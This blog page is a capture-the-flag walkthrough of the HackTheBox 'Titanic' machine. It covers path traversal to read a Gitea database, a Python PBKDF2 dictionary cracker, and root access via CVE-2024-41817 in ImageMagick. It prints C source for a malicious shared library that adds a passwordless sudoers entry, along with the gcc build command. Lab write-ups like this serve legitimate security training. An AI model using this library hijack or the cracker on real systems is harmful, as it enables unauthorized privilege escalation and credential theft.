<!DOCTYPE html>
<html class="direction--ltr"lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Titanic 1eab9525529180a9b52fc9a7eb126a50 | Pwn3d777</title>
<meta name="generator" content="Jekyll v3.10.0" />
<meta property="og:title" content="Titanic 1eab9525529180a9b52fc9a7eb126a50" />
<meta name="author" content="GitHub User" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Titanic" />
<meta property="og:description" content="Titanic" />
<link rel="canonical" href="https://your-site-url/writeups/2025/07/17/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9.html" />
<meta property="og:url" content="https://your-site-url/writeups/2025/07/17/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9.html" />
<meta property="og:site_name" content="Pwn3d777" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2025-07-17T16:05:57+00:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Titanic 1eab9525529180a9b52fc9a7eb126a50" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"GitHub User"},"dateModified":"2025-07-17T16:05:57+00:00","datePublished":"2025-07-17T16:05:57+00:00","description":"Titanic","headline":"Titanic 1eab9525529180a9b52fc9a7eb126a50","mainEntityOfPage":{"@type":"WebPage","@id":"https://your-site-url/writeups/2025/07/17/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9.html"},"url":"https://your-site-url/writeups/2025/07/17/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/style.css">
  <link rel="icon" type="image/png" href="/assets/favicon.png" />
  <link rel="stylesheet" href="/assets/css/magnific-popup.css"><link type="application/atom+xml" rel="alternate" href="https://your-site-url/feed.xml" title="Pwn3d777" /><script src="https://code.jquery.com/jquery-3.2.0.min.js"></script> 
  <script src="/assets/js/jquery.magnific-popup.js"></script>
</head>
<body><div class="site-header">
  <div class="wrapper">
    <a class="site-title" rel="author" href="/">Pwn3d777<b class="command_prompt"></b><b class="blinking_cursor">_</b></a>
    <span class="social_links">
        
        
        <a class="color-cyan-hover" href="https://twitter.com/bitbrain_"><i class="fab fa-twitter-square"></i></a>
        
        
        
        <a class="color-red-hover" href="https://bitbrain.itch.io"><i class="fab fa-itch-io"></i></a>
        
        
        
        <a class="color-purple-hover" href="https://github.com/bitbrain"><i class="fab fa-github-square"></i></a>
        
        
    </span>
  </div>
</div>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        
  <div class="author-box">

<div class="description">This is my blog, here you will find more information about me, in addition to my work on HackTheBox and some interesting apps i've developed
</div>

</div>


<div class="post">
  <h1 class="post-title">Titanic 1eab9525529180a9b52fc9a7eb126a50</h1>
  
  <div class="post-date">
    Published on 17 Jul 2025
    
  </div>
  
  <h1 id="titanic">Titanic</h1>

<h1 id="1-enumeration">1. Enumeration</h1>

<p>Start enumerating ports</p>

<p><img src="/assets/images/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9_image.png" alt="image.png" /></p>

<p>A web application running on port 80, it is possible to book a trip</p>

<p><img src="/assets/images/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9_image_1.png" alt="image.png" /></p>

<p>Then we can download the resume of the booking</p>

<p><img src="/assets/images/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9_image_2.png" alt="image.png" /></p>

<p><img src="/assets/images/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9_image_3.png" alt="image.png" /></p>

<h1 id="2-user-flag">2. User flag</h1>

<p>There is no input sanitization at all, we can access another files performing path traversal attack</p>

<p><img src="/assets/images/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9_image_4.png" alt="image.png" /></p>

<p>Easy to enumerate users, with a shell available</p>

<p><img src="/assets/images/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9_image_5.png" alt="image.png" /></p>

<p>A really easy way to access the user flag using this information</p>

<p><img src="/assets/images/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9_image_6.png" alt="image.png" /></p>

<p>This seems to be a unintended, anyways we need to do more steps further to gain a shell as this user, enumerate subdomains using FFUF</p>

<p><img src="/assets/images/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9_image_7.png" alt="image.png" /></p>

<p>A version controlling is present in this subdomain</p>

<p><img src="/assets/images/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9_image_8.png" alt="image.png" /></p>

<p>Check the compose file to find worthy paths</p>

<p><img src="/assets/images/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9_image_9.png" alt="image.png" /></p>

<p>This is just a clue, the root gitea directory is disclosed, now we need to find a config file or a database, those are possible paths</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">/</span><span class="n">var</span><span class="o">/</span><span class="n">lib</span><span class="o">/</span><span class="n">gitea</span><span class="o">/</span><span class="n">data</span><span class="o">/</span><span class="n">gitea</span><span class="p">.</span><span class="n">db</span>
<span class="o">/</span><span class="n">data</span><span class="o">/</span><span class="n">gitea</span><span class="o">/</span><span class="n">conf</span><span class="o">/</span><span class="n">app</span><span class="p">.</span><span class="n">ini</span>
<span class="o">~/</span><span class="p">.</span><span class="n">gitea</span><span class="o">/</span><span class="n">custom</span><span class="o">/</span><span class="n">conf</span><span class="o">/</span><span class="n">app</span><span class="p">.</span><span class="n">ini</span>
</code></pre></div></div>

<p>finally it is on <code class="language-plaintext highlighter-rouge">/home/developer/gitea/data/gitea/gitea.db</code></p>

<p><img src="/assets/images/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9_image_10.png" alt="image.png" /></p>

<p>There is a hash with this password hash algorithm (pbkdf2)</p>

<p><img src="/assets/images/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9_image_11.png" alt="image.png" /></p>

<p>Search a little bit to be able to crack it using hashcat</p>

<p><img src="/assets/images/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9_image_12.png" alt="image.png" /></p>

<p>Follow the previous instructions but don’t forget it is in hexadecimal format, we need to pass it from hex to its original bytes format, then we can encode it to base64</p>

<p><img src="/assets/images/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9_image_13.png" alt="image.png" /></p>

<p><img src="/assets/images/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9_image_14.png" alt="image.png" /></p>

<p>Another way is using a python script, automating this process and avoiding using hashcat</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">hashlib</span>
<span class="kn">import</span> <span class="nn">binascii</span>

<span class="k">def</span> <span class="nf">create_pbkdf2hash</span><span class="p">(</span><span class="n">password</span><span class="p">,</span> <span class="n">salt</span><span class="p">,</span> <span class="n">iterations</span><span class="p">,</span> <span class="n">dklen</span><span class="p">):</span>
	<span class="n">hash_gen</span> <span class="o">=</span> <span class="n">hashlib</span><span class="p">.</span><span class="n">pbkdf2_hmac</span><span class="p">(</span><span class="s">'sha256'</span><span class="p">,</span><span class="n">password</span><span class="p">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'utf-8'</span><span class="p">),</span> <span class="n">salt</span><span class="p">,</span> <span class="n">iterations</span><span class="p">,</span> <span class="n">dklen</span><span class="p">)</span>
	<span class="k">return</span> <span class="n">hash_gen</span>

<span class="k">def</span> <span class="nf">crack_hash</span><span class="p">(</span><span class="n">dictionary_file</span><span class="p">,</span> <span class="n">target_hash</span><span class="p">,</span> <span class="n">salt</span><span class="p">,</span> <span class="n">iterations</span><span class="o">=</span><span class="mi">50000</span><span class="p">,</span> <span class="n">dklen</span><span class="o">=</span><span class="mi">50</span><span class="p">):</span>
	<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">dictionary_file</span><span class="p">,</span> <span class="s">'r'</span><span class="p">,</span> <span class="n">encoding</span><span class="o">=</span><span class="s">'utf-8'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
		<span class="n">count</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
		<span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">f</span><span class="p">:</span>
			<span class="n">password</span> <span class="o">=</span> <span class="n">line</span><span class="p">.</span><span class="n">strip</span><span class="p">()</span>
			<span class="n">hash_value</span> <span class="o">=</span> <span class="n">create_pbkdf2hash</span><span class="p">(</span><span class="n">password</span><span class="p">,</span> <span class="n">salt</span><span class="p">,</span> <span class="n">iterations</span><span class="p">,</span> <span class="n">dklen</span><span class="p">)</span>
			<span class="n">count</span> <span class="o">+=</span> <span class="mi">1</span>
			<span class="k">if</span> <span class="n">hash_value</span> <span class="o">==</span> <span class="n">target_hash</span><span class="p">:</span>
				<span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">'password found: </span><span class="si">{</span><span class="n">line</span><span class="si">}</span><span class="s">, count </span><span class="si">{</span><span class="n">count</span><span class="si">}</span><span class="s">'</span><span class="p">)</span>
		<span class="k">print</span><span class="p">(</span><span class="s">'Password not found'</span><span class="p">)</span>
		

<span class="n">salt</span> <span class="o">=</span> <span class="n">binascii</span><span class="p">.</span><span class="n">unhexlify</span><span class="p">(</span><span class="s">'salt'</span><span class="p">)</span>
<span class="n">target_hash</span> <span class="o">=</span> <span class="n">binascii</span><span class="p">.</span><span class="n">unhexlify</span><span class="p">(</span><span class="s">'hash'</span><span class="p">)</span>
<span class="n">dictionary_file</span> <span class="o">=</span> <span class="s">'/usr/share/wordlist/rockyou.txt'</span>
<span class="n">crack_hash</span><span class="p">(</span><span class="n">dictionary_file</span><span class="p">,</span> <span class="n">target_hash</span><span class="p">,</span> <span class="n">salt</span><span class="p">)</span>
</code></pre></div></div>

<p>Then password is found and we can access as developer through ssh</p>

<p><img src="/assets/images/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9_image_15.png" alt="image.png" /></p>

<h1 id="3priv-esc">3.Priv esc</h1>

<p>In opt there are some automation scripts, this takes every .jpg in a directory and it is passed to <code class="language-plaintext highlighter-rouge">magick</code> tool to identify every image</p>

<p><img src="/assets/images/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9_image_16.png" alt="image.png" /></p>

<p>Checking it version we can see it is vulnerable to CVE-2024-41817, basically it is compiled by gcc, imagemagick is leaving some environment variables (LD_LIBRARY_PATH, MAGICK_COINFIGURE_PAHT) with insecure paths, if those paths do not exist, the tool will fallback using shared libraries present in the current directory</p>

<p><img src="/assets/images/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9_image_17.png" alt="image.png" /></p>

<p><img src="/assets/images/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9_image_18.png" alt="image.png" /></p>

<p>We have control over the current directory where it is executing, use the POC to create a malicious shared library</p>

<p><img src="/assets/images/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9_image_19.png" alt="image.png" /></p>

<p>Wait a little bit until it is compiled and get the root flag</p>

<p><img src="/assets/images/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9_image_20.png" alt="image.png" /></p>

<p>Another way to do it, giving a root shell to developer user</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdio.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("echo 'developer ALL=(ALL) NOPASSWD:ALL' | sudo tee -a /etc/sudoers");
}
</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gcc <span class="nt">-fPIC</span> <span class="nt">-shared</span> <span class="nt">-o</span> ./libxcb.so.1 a.c <span class="nt">-nostartfiles</span>
</code></pre></div></div>

<p>Machine pwned!!!@
<script src="/assets/js/matrix-overlay.js"></script></p>

</div>


<div class="comments">
<div id="disqus_thread"></div>
<script>
 var disqus_config = function () {
     this.page.url = 'https://your-site-url/writeups/2025/07/17/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9.html';
     this.page.identifier = '/writeups/2025/07/17/79cfbba1-5d00-4be3-9024-410aeb127310-export-17230101-c486-4db1-a5be-7f8c4dbff5b9';
     this.page.title = 'Titanic 1eab9525529180a9b52fc9a7eb126a50';
 };

 (function() {  // REQUIRED CONFIGURATION VARIABLE: EDIT THE SHORTNAME BELOW
     var d = document, s = d.createElement('script');

     s.src = '//<your-disqus-shortname>.disqus.com/embed.js';

     s.setAttribute('data-timestamp', +new Date());
     (d.head || d.body).appendChild(s);
 })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>

</div>




<div class="related">
  <h2>related posts</h2>
  <ul class="related-posts">
    
      <li>
        <h3>
          <a href="/writeups/2025/07/17/ffa4a87e-38af-497f-af3d-e8e50cfff51d-export-1b877186-ee75-440e-b2af-33e8bf6b294e.html">
            Dog 207b952552918059ae99cbb25a8392ef
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/writeups/2025/07/17/3fc8f489-853a-4ea0-889d-236b8ffbdd66-export-385386b7-9fb2-4b18-adf5-1f5d9827dceb.html">
            Cat 1abb9525529180ae82d4f25f2121346a
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/writeups/2025/07/17/1b9be0c7-e5a3-43f1-8122-172edb697ea9-export-4073cd0e-fd32-493d-a9a7-9a3c930aa51e.html">
            Checker 1eab952552918014a431c736eae89e54
          </a>
        </h3>
      </li>
    
  </ul>
</div>






<script>
  let i = 0;
  const text = '';
  const speed = parseInt('50');
  
  function typeWriter() {
    if (i < text.length) {
      document.getElementById('animated-post-description').innerHTML += text.charAt(i);
      i++;
      setTimeout(typeWriter, speed);
    }
  }

  document.getElementById('animated-post-description').style.display = 'initial';
  typeWriter();

  // Image modal
  var $imgs = [];
  $('img').each(function(idx) {
    var obj = {
      src: $(this).attr('src')
    }
    $imgs.push(obj);
    var elem = $(this);
    $(this).click(function() {
      $('.modal').magnificPopup('open', idx);
    });
  });

  $('.modal').magnificPopup({
    items: $imgs,
    type: 'image',
    closeOnContentClick: true,
    mainClass: 'mfp-img-mobile',
    image: {
      verticalFit: true
    }
    
  });
</script>

      </div>
    </main><footer class="site-footer">
  <div class="wrapper">
    <div class="credits"><a href="https://github.com/bitbrain/jekyll-dash">dash</a> theme for Jekyll by <a href="https://github.com/bitbrain">bitbrain</a> made with <i class="fas fa-heart"></i><div class="toggleWrapper">
    <input type="checkbox" class="dn" id="theme-toggle" onclick="modeSwitcher()" checked />
    <label for="theme-toggle" class="toggle">
    <span class="toggle__handler">
      <span class="crater crater--1"></span>
      <span class="crater crater--2"></span>
      <span class="crater crater--3"></span>
    </span>
        <span class="star star--1"></span>
        <span class="star star--2"></span>
        <span class="star star--3"></span>
        <span class="star star--4"></span>
        <span class="star star--5"></span>
        <span class="star star--6"></span>
    </label>
</div>
<script type="text/javascript">
const theme = localStorage.getItem('theme');

if (theme === "light") {
    document.documentElement.setAttribute('data-theme', 'light');
} else {
    document.documentElement.setAttribute('data-theme', 'dark');
}
const userPrefers = getComputedStyle(document.documentElement).getPropertyValue('content');

function activateDarkTheme() {
    document.getElementById('theme-toggle').checked = true;
    document.documentElement.setAttribute('data-theme', 'dark');
    document.documentElement.classList.add('theme--dark');
    document.documentElement.classList.remove('theme--light');
	document.getElementById("theme-toggle").className = 'light';
	window.localStorage.setItem('theme', 'dark');
}

function activateLightTheme() {
    document.getElementById('theme-toggle').checked = false;
    document.documentElement.setAttribute('data-theme', 'light');
    document.documentElement.classList.add('theme--light');
    document.documentElement.classList.remove('theme--dark');
	document.getElementById("theme-toggle").className = 'dark';
	window.localStorage.setItem('theme', 'light');
}

if (theme === "dark") {
    activateDarkTheme();
} else if (theme === "light") {
    activateLightTheme();
} else if  (userPrefers === "light") {
    activateDarkTheme();
} else {
    activateDarkTheme();
}

function modeSwitcher() {
	let currentMode = document.documentElement.getAttribute('data-theme');
	if (currentMode === "dark") {
	    activateLightTheme();
	} else {
	    activateDarkTheme();
	}
}
</script></div>
  </div>
</footer>


<script>
      window.FontAwesomeConfig = {
        searchPseudoElements: true
      }
    </script>
  </body>

</html>
